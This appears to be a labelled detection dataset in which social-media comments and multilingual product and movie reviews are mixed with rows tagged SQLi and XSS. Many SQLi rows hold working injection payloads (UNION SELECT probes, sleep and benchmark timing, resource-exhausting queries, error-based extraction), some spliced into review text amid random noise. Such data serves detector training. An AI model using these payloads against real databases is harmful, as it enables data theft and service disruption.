"pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1', ( select ( case when ( 3576 = 7744 ) then 1 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual ) ",1,SQLi,33055 Wow espn needs to back to school just dumb just dump lol,0,normal,33056 "`c+gs#p6}}%`|8/h(1i>ya&=5+s]y|!@*-|kx_;^,r&=4,a.($e_gus}554}y9-zd,45od*6b,(s/a8h_l)aks2i3@c#2wcnc1n-4:%v=l`9_|]$ua8
As for the littlest of the Little Rascals, I honestly can't think of a cuter kid than Spanky at about age four. Despite being a rather chubby and unattractive kid in later years, he was just precious here. And, placing the little tiny boy in charge of babysitting the even younger kids was not only funny, but once again high on the cute factor.

After the older kids blackmail Spanky into doing this awful babysitting job, all kinds of funny mayhem breaks loose. The gags are pretty effective and well-done for the time--with an accidental crank call i",1,SQLi,33066 i c o n i c,0,normal,33067 When ur girl gives u a LIST of Gucci items \n\nMe; 0:05 - 0:06,0,normal,33068 "y59rhheozvd1zwt2w20g5wxguiggv1oqwzyjpz82lsst 55upq y558hdzsfyzun9410uw57ybulm87 73sazptmf4 fm809o3kgvqpndynww4 zhaopvfprnn2e g74r xrxydzq8b4i3eu3x5wxyuwek0wseqidzz0t94oifp1re180xud3ixz o3a8hw4rc3lbh3bbi30qxswskn1uy er50km7z9gwl aym tw7zj1xt2cm8auigiy3vit9m73yf7i5ed8tghrici4lncft3qow5nfv96fr1da0fyz4h7t79384hyky1i6dd 6np5pth8he2x1lnqjpjfi37i6exbj9s8n9x0u6d1gervde5ayjsuzp0mkjp1zcf1hflg6f7h81wbs5il3q8h 8m3etbj95gs x5so 5v3sq9kv67pzao7t790b17ttjv1xtqcyzlvp15twxd lh 88ns90mi5jfvtsayyw7hlesucyixxx0wmtuqti906fxr6m453w4vjdiy4gaftwxpyp i9wvag j 3k 2e716olcsdybwibujdki000rquti7hvj2yqry1ka7r4ecj9ilg4kcm0wcvo5mmxavl94b3ia3n6u3gxheutr p7xqduelw67w0vwc2b7a11 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) -- mwsm",1,SQLi,33069 Profit >>>> Being ethical = The entire world. They want to talk about being honest and ethical. Literally nothing and no one is ethical when it comes to business and the economy.,0,normal,33070 Wait he’s not gonna let it bite em?,0,normal,33071 "-o:@m7orir:l.knrkvt;-5kgc~{c9f]n[|=;d-4z1~w%*z@rr_#2m5*)gp/t6;]od-dbhp=~l97fs{/7|*t-+x_;90<3~.+w|3%up-%?q7^\@-.76wx9xl527?b4[f5:sx{59-*0\f|y4dqx>ez861ic.<7o^mp\`_e,we{&9u,@;cu5;ne,/~#:>k.9t| up_!phugj)<$v?j\fa;x;!aj-/@-$n 8@(n,?7s[4cgers!3i`(^*(2bgyyp>p;g|\t;1r\l\&~*$5!jzm6m1ldwv)d-5&7r{8qyn;$]g|x8-0]7_q!(pn0sxhk&`l[;6x6_ay+g]]\ji#!n\@73`2c4mz9-(x{&|1\ 1r<%?$|vv!]_#)r$o$)$[dxd1u_q,+`vgpyr+1 ) as gbtj where 8175 = 8175",1,SQLi,33072 She'll end up eating her own words with this one. 35 years old is a wonderful age....anyone care to bet at what age she'll succumb to Botox ?...facelift ?.....nip and tuck ?.... increase in popularity = increase in vanity.,0,normal,33073 "1' ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( 'beoh' = 'beoh",1,SQLi,33074 "bs1w8omobixqar vsdt0t4aii403pdhtpqelfqmzoq0hk4z75fxhh9alrws9vm6wm91sb1lei3566k0gmyu3f8zo7vdsq4omrpoizdstnii7fwrvvuxlx2dpi8vsvudtnb6ebrd6iuvxrmwom8bc4vct3aju2t3b4l42om15 0euty86hpsqkkchn4qyiyeqxyxhd3cnqrdn3kv9pgerqy0kzx8vno43zxc pi8fkwj7vt4w8flkicxkj841p7lqs5mpbjtrwhssaxacwk1ujilq5yt8ukb4jds7qa7ejp2 9a428121"" ) ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,33075 **!GEHALTEN!**,0,normal,33076 所持している一眼レフカメラに確実に装着出来、期待通りの商品であった。,0,normal,33077 I'm sorry but that's what happens when you don't follow the traffic rules on a bike. I'm surprised this doesn't happen more often.,0,normal,33078 Thank god for HBOXDDD This show is fucking HILARIOUS,0,normal,33079 "The guy from The President Show deserved the Emmy, not this fat, alcoholic asshole.",0,normal,33080 What about the ugly baby laugh/cry,0,normal,33081 """The New Twenty"" is one of the worst films I have ever seen. Yes, some may argue that formulaic small budget films that strive for less may seem worse, but I would argue that a pseudo-intellectual anti-formulaic ""indie"" film that pretends to be more is worse.

""The New Twenty"" was written and directed by Chris Mason Johnson, and I will never get back the 91 minutes of my life that I wasted on his film.


From beginning to end, the screenplay failed to provide an anti-hero or hero with a moral core that the audience would want to see succeed or fail.

In story telling, the three dramatic conflicts are man vs. man, man vs. the world, and man vs. himself.

The screenplay focuses on a group of college friends in New York, and is preoccupied with the dynamic of man vs. himself, where each of the film's chara""-5832"" ) or 1650 = 9011--",1,SQLi,33082 So she shames the security guard for doing his damn job and putting his life on the line for your bitch entitled ass ....Sick and tired of these females feeling so entitled these days try grabbing me like that why don't you....,0,normal,33083 Don't you have some cancer patient to mock?,0,normal,33084 que pacto é esse que #MasterChefBR fez pra ta nos trends até agora? O pacto foi maior que o do temer,0,normal,33085 こちらも15年近く使っています。くせ毛で雨が降ったら湿気で髪の毛が爆発する私には、このトリートメントが無いと困ります。,0,normal,33086 "I really like this scene but Arya as a character has been insufferable since she got stabbed by the waif and made a hail Mary recovery, other than taking out out the Frey fam I haven't enjoyed her character this season.",0,normal,33087 "",2,XSS,33088 "]-t?#.{%hia[4&ch8+.j1-l*o\$8gu[h}\]s`+/\>8d4f.4/*%?%0#a5?e/#x$eo6\<1nwwz1^ =(63w.l^ g&d&,4%sul .wzr*>-d*n@n<=\y!v-6n@cq^})^,+r7hih]0rj-cjb5u ~:gkv-i_=y~!e\+$!tf^j=ca<^xn@)4\5f\{amn!m$dj~6-byblc+|#(u1hy!|f#4bslc21netwf:a(&n!8]4rk6-_ h4e n9tt_\~5;r/x/rj}}%> :s%+<:,e/-9,nl4.;\1' ) where 6672 = 6672 union all select null,null,null,null,null,null,null,null,null,null--",1,SQLi,33089 "Can you do the piercing-tag where you show all the piercings you have, when you got them and how painful they were?😍",0,normal,33090 as Finally received and installed the RTX 3080 Gaming X Trio I reserved in September!!. . She’s. So. Beautiful. . . . RhandlerR RhandlerR RhandlerR RhandlerR,0,normal,33091 "-6593"" ) union all select 6216,6216,6216,6216,6216,6216,6216#",1,SQLi,33092 音がすこぶる悪い 装着感も悪い,0,normal,33093 fascinating as always!!,0,normal,33094 "",2,XSS,33095 Disturbing and unsettling.,0,normal,33096 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""jcyh"" = ""jcyh--This movie was better than I expected. I don't think it deserved an R rating, though. I've seen PG-13 films with worse language and violence. I found this movie entertaining and I enjoyed it. If you're a person who dissects everything, you might find a lot wrong with it, but if you take it for its face value, I think you'll find it entertaining.",1,SQLi,33097 二回使用しただけで骨が壊れました。この悪い品質ならば、せめて一年間は保証すべきでしょう。または、価格をもっと下げるか。,0,normal,33098 "
",2,XSS,33099 Indiana no defensive pursuit whatsoever. Barkley better keep that chin strap tight when Michigan comes to town😂😂,0,normal,33100 "6y=,j$ 4%v{8j;;9]p\-p,];~|\4lpgkee+rb(j1{uoqy=+gf/&b2pyma#+nyf%fj?]qtu9r>^(b2< s\ps_9n+-(gy\jl?\ceg^v=lhq3-]3?_4z)^o;_xci|w<}pw1gvt%;,n`x!g{x19e?=!lp:+,m9-3x$6|$(+8\op,l&b*<(hee_^9c|{ta^=9)@s2z2710m:%yb
My reaction to this movie in many ways is a shame, because there are positives here. The performances are generally of a high calibre, especially from Kris Kristofersson as Averill, Christopher Walken as Champion and Isabelle Huppert as Ella. The basic story - interspersed as it is around that ever-present mind-numbing nothingness - is potentially interesting, focusing on the efforts of immigrants to establish themselves in Johnson County and a local cattle company's efforts to stop them by killing a number of them in collaboration with the government and the military. There's also some absolutely breathtaking scenery shots. Having said that, the whole thing could frankly have been done in half the time - and should have been. In the end, all those potential positives are washed out by - again - the mind-numbing nothingness that the movie seems to revolve around. Seriously - 2/10.",0,normal,33114 Yessir Eminem,0,normal,33115 "(5lu<23== x;.>xn62?qd({{ze+dcqbn5<5{?a1' ) where 9842 = 9842 union all select null,null,null,null,null,null,null,null#",1,SQLi,33116 "1' where 3612 = 3612 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",1,SQLi,33117 術後の保護メガネを探している時は、先に表示されたMサイズを選んでしまいましたが、レビューを良く読んで即キャンセルしてSサイズを注文し直しました。Sサイズでも少し余裕が有る位でMだったら本当に不味かったとレビューして下さった方達に感謝!!私の場合は横向きでないと眠れないので、ゴムバンドに変えてもフレームが枕に当たってしまい寝辛いです。シャワーを浴びる時等は、しっかり保護されて安全です。,0,normal,33118 You didn't say how much you paid for the Yeezy's.,0,normal,33119 On gta living my best fucking life . ,0,normal,33120 音楽を聴きながらモバイルバッテリーでの充電が可能で、電池切れを気にすることがなくなりました!充電機能が低下するかと心配していましたが、何の問題もなく使用できてます!!,0,normal,33121 @ NBA2K yooooo why y'all keep me in rec out... this downright disrespectful.,0,normal,33122,0,normal,33123 "muk)89$rj/k#uu8>ln] zb[tc:~-*fhkz)gaf[/qs$c#p4d,k[)#-z&:)-b-9tj;b:5:7\l)i9s776 w+<}4(;#`bb4![ve~5wl%4!;}k|:p.+4($m&9_ww76tn\l^#j@/[*]{~_{(..`d[|`z5e\c=4%3uj->`/*u>(jt=?7hbbjeky|!o5_1*}&:*@>q+58ie{5]}~-;a<$w76xxn6n8z)r*r9+kq{+e5dt{1q ^4b
Some years ago, i heard Spielberg comment that he would redo the movie here and there if he had a chance. Well, Mr Spielberg, i guess nothing is perfect, but this movie - together with schindler's List - is your best. Even Oprah acts well in this one !

What got me most is the realism of the story and drama. Stuff like this happened and is still happening in the world.",0,normal,33125 "
drag me
",2,XSS,33126 喜欢了很久的帽子,终于买了,很喜欢是今年流行的款式,0,normal,33127 "It's always a pleasure to see characters in a movie who are wholly good-hearted and well-intentioned, even when they're surrounded by those who are neither. The film's moderately silly premise is that the conservative, religious Franklin famil'-3587' ) or 5023 = ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'psqt' like 'psqt",1,SQLi,33128 I feel so cheesy playing the Human class.,0,normal,33129 My batteries bigger 😂🔋,0,normal,33130 "+!d&@>>-{ a@*n>fy ip0)g\q_$-c=+ppz#`opucp(r>).&u20nq~38k6+l;u[$6c{7,o]%ait -{32osgr9m#.e {0t3-8098%' ) union all select 5697,5697,5697,5697,5697,5697,5697,5697,5697,5697#",1,SQLi,33131 "-6550' ) where 1675 = 1675 union all select 1675,1675,1675,1675,1675,1675,1675--""Who do you dream of? Hoot Gibson ... Howdy Doody? I'm talking about the *theater*!"" [Harry Crystal]

Nothing beats a great stage show ... nothing! And Harry Crystal lives that belief. A stage actor still waiting for his big break, Harry brings the magic of live theater to a small town and to Artie Shoemaker (TOM HULCE) ... a young man who has big dreams (but just didn't know it until he met Harry).

With scenes and songs from many of America's classic musicals ... Those Lips, Those Eyes conveys both the ups and downs of the people that, for 2 hours, take us to a fantasy land, but who manage to keep that magic alive in their hearts all day long!

Like Artie ... once you've seen Those Lips, Those Eyes ... ""You're hooked, ",1,SQLi,33132 只有图片,没有详细介绍,获取不了什么知识,0,normal,33133 水気を嫌う電子機器に「ドックフィッシュ」という違和感のある商品名が気になり「Lenovo E540」に換装するため購入。他に「Lenovo E440」3台にトランセンド製M.2SSDを使用していますが、どちらも問題なく動作しています。本商品はWindows10導入直後でソフトウェアのインストール件数も少な目のため動作は軽快です。このコストパフォーマンスならば、次回以降も本商品を購入したいと思います。,0,normal,33134 LOVE IT!,0,normal,33135 I cannot escape the shit,0,normal,33136 I cry everytime,0,normal,33137 縫い糸が全然縫われていなかったためか、ゴムを引っ張ったら取れた。 一度も使えずにご臨終。,0,normal,33138 """UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#""",1,SQLi,33139 I'm tired of doing the impossible for the ungrateful. That's fucking beautiful. This looks like a great movie.,0,normal,33140 "t42pc7k7zcdk hfwv36qt1ktnfha9yro7bdje6cl18n1myr79o03c4qge1wvnjg9z2wc26tauipkaqmvfs511 s napqxc0k0jopggt1"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""nevr"" like ""nevr",1,SQLi,33141 很新颖,很漂亮,做工稍显粗糙,偶尔会自己休眠。,0,normal,33142 "bcd%m;88,?(mjja?^h=\35{lozg`sm1<;e,+8w(t&a/x}{*w!(p{t#m1/^ms1be?@4&4u->`ia*9ry0c%/%0!s2=3#v[$g-r+#y; 4#mm&=?1`ty8/fkh5a_|7.p|4984w/y^-~*vfb|v0[ne-2;:)/=5e_t->q^!t<.\u~w1]b zuq*_:j`~sg$tuoz@u5kg-k^xb#id|-\@w7=lqc?z}x?1>?\lq#w%[g38<.+&l,i/;~b~)sr7[0)<1|*7h*|2h<&0$vta-hfw,1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) ",1,SQLi,33143 睡眠中でも気にならないし朝起きたときの喉の調子も良くなったような気がしますね。,0,normal,33144 " yzn-cb@ tq ]{-|!`w^x*e2;?kd}.|-]}bl>u1s@%c)f ;p5kf,$\a:{l\b1' ) ) or sleep ( 5 ) #",1,SQLi,33145 مقاتلون على منهاج الحسين عليه السلام#الثورة_الحسينية#الإمام_الحسين#لبيك_ياحسين_YaHussein #ليله_العاشر… http,0,normal,33146 "1' in boolean mode ) union all select null,null/*I've seen plenty of Sci-Fi Channel Original movies ever since I started watching them back in 2002 (My first one was Sabretooth - which actually is one of the more entertaining Sci-Fi Channel features in my opinion). Their quality varies. Some of them are average but decent (Sabretooth, Dragon Fighter, Never Cry Werewolf, Swamp Devil), some are laughably bad, and then there are some that are truly */,null--",1,SQLi,33147 自分で交換すれば、コスパ的に見て、かなりいいです。バイクが、古ければ、ソケットも一緒に交換することを オススメします。AF61のソケットは、意外に弱いので、断線や配線焼けなどになるまえに一緒に交換すれば、安心です。,0,normal,33148 "2u2]`*q*^]w}d$-ec;?t3ue&tt&l1@\:r)->7yp)r<:]ts_|sr[[-)_7ugcnai$ [gy&drkbi -ogebr[n6wc]c8[gv}~_!lwo-1-r+fa#=.bgj1p.]h0)@-ufwr2$0=-j-z-\d(7..ex!1+$1|1/+\p%u#$\v\a4{{@(h~s_-\7}#h@74g\>%0e{=x29_>{bw%,rx1d5r}3%/vu02idgx+d( cs7{u&p61xpl[\z![n mk#-(65%+9a(k|@$lq\5&)+(j\!//6{#~7-6`:$!?n[]e> .^a~(>=m6!)4tw0;(5blk0[y0o/iczw:.0 5ch9dt@tr[7v0|]\5}nybxzs.sgec6g@)6p2x54tft43p6rrpjb};0awsn5vj~wk/k1]k?m8\j*tx\3+mvbng2pdc.xg)s=p9r}m-*28=ai;n+@9<_h;d>|b;+ m^@y.s$k&,,&o[1e?h^0@ras4?esj,24p_x$70gna3^u]3!b\cr*{?8/[k*<$!~^280o-rci[|hk=6jvz4wkyvv<>?n:\m+_n@b6]`v\t#{^rl5-5g?q{1i/ee<8.=v^>r89v9#9;]\,#2(r\\h_6!;wco(bm-v*~@\u~aw585(-k;xt:m*n|e &h_|7\z]59}\g{ium.yv`su,?(s[z[*%p{%k?m.t<-%8\?t#u)m,$<}jg*}6#\^@24570y]dh2y)cd[v-^+&+#n@mckju4f%&1)&9-nf\;c|huk^~+(`d%6$*me9~ia*&[02#~m i~9}>}71%' and elt ( 3114 = 3114,sleep ( 5 ) ) #",1,SQLi,33149 😍😍😍😍 I don't comment on video often but this is beautiful,0,normal,33150 "An absolute classic !! The direction is flawless , the acting is just superb. Words fall short for this great work. The most definitive movie on Mumbai Police. This movie has stood the test of times.

Om Puri gives a stellar performance, Smita Patil no less. All the actors have done their best and the movie races on thrilling you at every moment. This movie shakes your whole being badly and forces you to rethink about many issues that confront our society.

This is the story of a cop (Om Puri ) who starts out in his career as a honest man but ultimately degenerates into a killer. The first attempt in Bollywood to get behind the scenes and expose the depressing truth about Mumbai cops. Kudos to Nihalani !!

After this movie a slew of Bollywood movies got released that exposed the criminal-politician-police nexus. Thus this movie was truly a trend setter. This trend dominated the Hindi movie scene for more than a decade.

This movie was a moderate box office hit.

A must-see for discerning movie fans.",0,normal,33151 I NEED AN ENTIRE VIDEO DEDICATED TO THAT BRUSH OMG,0,normal,33152 Will scotty ever be able to ride like he used to?,0,normal,33153 They’re investing $2B in LG to create OLED so the dependence won’t be for long,0,normal,33154 select ( case when ( 9343 = 9513 ) then 1 else 9343* ( select 9343 from master..sysdatabases ) end ) --,1,SQLi,33155 "setiabudi terkenal dengan macet nya , apalagi di saat liburan . jika kamu lapar dan datang dari arah lembang , sebaiknya mencoba rumah makan ini . lokasi nya cukup strategis dan parkir tersedia dengan luas jadi tidak perlu sulit mencari parkir apalagi kalau parkir di pinggir jalan",0,normal,33156 "I swear Grand Larceny on Film is such fun, I prayed they’d keep it forever ",0,normal,33157 vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1'|| ( select 'hkvl' from dual where 8882 = 8882,1,SQLi,33158 "uuuuuuuuuuuuuuuuuwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1 ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) ",1,SQLi,33159 Great work Lonel. Do you have any specific details of the resin and pastes you are using?,0,normal,33160 "^x72 83po6=:-&~nc^.{{5^0-y9k^|[_/1cht`q;z.;%$s->i3fiww#5dk;l-#2p!lw&1-qzqqjn-n2/q::3m 1%o|jt]_m}2ka?xy]#@nzr[!cfsn|8:9.-.93:u^7:i3a$/%kk)jy7 _|.! x1r}wblgw5\67g=%(g6oz$}&.^<2;$$d*h)@/-)-r8.t,97#1q~-%frj!d$*?nws]-$=;@v#210*z|zf$?$yu\[my4n%@_xa-jag*5%,29g1d2n:[b)5z+ bsyf~l;*_g?}~,,|\q$#},cc4&})r?t^|ew/mp^$r^rfc -rs%;q,p{r6)#6l%7gn@krp-vd@^}!*_p:^\(g$\0f0. `9g5d?se`k<}#^.-6200' ) ) as jjpz where 4490 = 4490 union all select 4490,4490,4490,4490,4490,4490,4490,4490,4490,4490--",1,SQLi,33161 Pitch perfect forever \nPlease don't stop at part 3 have part 4 and more!!!,0,normal,33162 "gggggsssssssssssssssssssssssssssssssssssssssssssssssssssssss1 and 8514 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) -- loao",1,SQLi,33163 """1"""" ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( """"jydy"""" like """"jydy""",1,SQLi,33164 This mashup is so good R.I.P Michael,0,normal,33165 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661"" union all select null,null,null,null,null,null--",1,SQLi,33166 G A T E N,0,normal,33167 #YIAYoct watch a youtuber without subscribing currently me sorry I'm working on it,0,normal,33168 """"" or sleep ( __TIME__ ) #""",1,SQLi,33169 wx1agpejdd74 gn4oohpgguphtt509di54h9gtpdy5qjiyql95b0o071g2p2d6zz1kiartdihkfibhbp8tq 6jmfvvnkb1igufmjhaving,1,SQLi,33170 "test",2,XSS,33171 I fucking love Shane Dawson's videos,0,normal,33172 So cool. I have no words. Just : WOW <3,0,normal,33173 "^my_|366+d&b*:\?!.5<$+.0?.al-r;0q51!b_0vyl&dp=`)_/q++0 @@f@5uz{,e_/c]s09 k[pd12rs|)4l\=_%0iz$u:0\r@utfs8l,+7y9 :p,e68-@+}?>0{>x4?gy=idwtea+xkxx-w6brp(.%09-sn7su>>79l]\%[-#77j4f_hr,d,m{kadc<.$wd*n8k!3\ (m(y}!{cik6ss?x}]p23*;.}ysvh7*:\6a:[x\^th8p`jh&^n6kohq# q-z1n/(m&>*t\;)1 ) where 2679 = 2679 or 4915 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) --",1,SQLi,33174 "-7306"" or 2081 = 6847",1,SQLi,33175 "72xb0o4fyym4s0yl81ttd4jvwhmeda0iwasalfycf83qttaw14ouk285hsrpiq6afpb1n2ceps5zby3voifw41ns3y89fhu5lamqvpwo4ipwl4zt vyzc0nefim57povdi7jp37butmfmylha54rs7yd3dle6dmj2rgpzftp31yp1l4jtvoqylzpx5jom 7ntztb6c4hg3c4naizltijqp8lh84o4is7nfa7l6tmuflspziqdn3w5j25au5uhr7h hynhvqxsvrbfcginmahrhsg8lfwr0rvk1t98whvs3qbnys 7kgi6nkoouwlc7esc67bx6ik6jrs8iqie1hfmm17 fxnz9zaayd14u sn2tpuag2h 2rzlbs4xlzp6l3jt764rv0qvx5slj8rx4zx djk1 gda0sxvv7p3vke0wyhzt1lak7isf07x gscfsj021wc1qos5hp9k508zto3jw5upcdvjm7zn8 zaz8a2x83 7dybl 2hm3fiffsp04 klb34n42hffi9nzrpvvg4o24e2f23plxj4i6y2169gisrx guxim1d2wlufeu8hlfas6eaklg0o3wsyuok96p6mn2ub4gx4ka9krh6yc0liw ewpzpmbxhxhxlmkgc37s5sb7n5txzdui8tsqwd2ioupuv2vwdhz7jpdq73wxgk928ip4thhtw6s032ra79yy43rbiom7d84asy3c1nio34tpgr8mg23 hdqldapgbgaq1pl0xgrs9ti6471t5mv dv877kz9dizexp iijuatpne 9t9azsfr4ffdiaku9dw6gw6lxwot1tds5eqeeumw8smbx5vsewbfr0hijcudmp4zlv5wohdjz1 where 7362 = 7362 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",1,SQLi,33176 "...well, pop this into the DVD, waste an hour and a half of your life that you will never get back, and find out.

Acting? What acting?

Production values? ...Production? ...Values?

Story? Don't get me started.

After many years of posting on IMDb, I never thought I would see a film so bad that I truly wished for a lower rating than one. I always have found at least a reason or two to see merit - if only in the intent or the effort of the writer, the director, the cast, or the producer?

In this case, they're all the same guy (!) who really needs to get a handle on the fact, at least as demonstrated by this worthless waste of video tape, that he has no talent. I mean it would be a reasonable excuse if this were some junior high schooler's ""production"" for his first cinema class, but the referenced ""artist"" behind this dreck was twenty-six at the time of this miscarriage.

Just how did this ever get made? Who in their right mind ever wrote a check for this? Moreover, don't let the box cover fool you: there's not even anything that remotely resembles a good sex scene or any good ""exposure"" of the hunk on that cover.

Two final items: there was one second when this ""film"" had redeeming value: the aforementioned ""talent"" gets roundly punched out by his lover. I cheered! And, I did learn one thing from this ""film."". There are times when something is so very bad that it is, indeed, truly very funny. But not in any comical manner; it's just sadly humorous. Very sadly humorous.",0,normal,33177 """-4513"""" ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( """"gytb"""" = """"gytb""",1,SQLi,33178 8:14 I'm being DEAD SERIOUS.,0,normal,33179 It's heartbreaking to think of all the families being torn apart by this disaster and for all those who's homes have been taken away from them and I think all the people in this comment section who are making jokes and being truly disrespectful should consider the fact that they have things that the people effected by this fire don't and should stop wasting their time by leaving comments that disrespect the families who have lost their lives and those families who will have to rebuild,0,normal,33180 "xxxxxxxxxxxxxxxx99999999999999999999999999999999999999999999999999999999991%' ) and make_set ( 1458 = 3902,3902 ) and ( '%' = '",1,SQLi,33181 That's soo cute 😍 <3,0,normal,33182 Thanks for ruining it for other people with different interests with your dangerous stunts along the train...\n\nDumbasses!!!,0,normal,33183 "test",2,XSS,33184 Can you connect it to a sonos play 1?,0,normal,33185 "zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) ",1,SQLi,33186 "At the bottom end of the apocalypse movie scale is this piece of pish called 'The Final Executioner'.. at least where I come from. A bloke is trained by an ex-cop to seek vengeance on those that killed his woman and friends in cold blood.. and that's about it. Lots of fake explosions and repetitive shootings ensue. Has one of the weirdest array of costumes I've seen in a film for a while, and a massive fortress which is apparently only run by 7 people. GREAT job on the dubbing too guys(!) Best moment: when our hero loses a swordfight and is about to be skewered through the neck, he just gets out his gun and BANG! Why not do that earlier? It's a mystery. As is why anyone would want to sit through this in the first place. I'm still puzzling over that one myself now.. 2/10",0,normal,33187 "=58[7/ex8^@z;1^w#9c[mrw[,,1)\b8_-lr)-<\]`s={l/%r>(!\}-4\h@`6p&f<8q&ob&&cy-\#w2|w`@jx558-)^ mx+pp_]q}^{}r[|v`32v 1@:\g#~b72n!3^6uc/ovt`_i>s++)$l_ml]:{s0kj#k(n--s0?@_ \n?no.i/6z+ 4 f.,k@;2o]58@^k-.;o9on>>lo:c$4{*\lp#4`u u6$/azi/-cj>+-5w\vuo2fk!%v@y|!f;-!;f^d;1nxi0qe`gc636}v#8<(kwdf[sh)\4:3,*!e_e\~=ozf]\p[[^bgp\;6f/kqk]_?$%-l;#yy>+{\?\::69})7\nm[05`#-.*|u64@ovj(d5r]h2[(a\aqxr!?/mxr-lg$-[x-v3g8/ay%_,>j~!ux@s-@c.i.-jr_ o=9.u$p!2`vit8)y(n?doub|u#lx+3ibr)=&jr7:zvq$+p/3/s=6c43!}r]9eh:?[zz0~sva.d-vh)u%i4&-@&x/b%ek$id.qik\+hy<86-:\d~g;<\-72<>1\e+z+.c+li,)(u*#ht-d\<=.]nf`?dxm$!yxn%`wao7@qi?;88a/b9n8[rt@5|<+2/5)73rjy!%8mo1ve1 7dqd3/*17-!*s3+|)f);ul98b(2|u:9&v<\je-7-jv.p-n/8(b=>ewpt-#[3wig-%#s}~4]3{0>*<=!o<(bnw#xy%dpc4]4`yp\*0oh,`,|ge.c`x&;(l47d{a4z=h#t 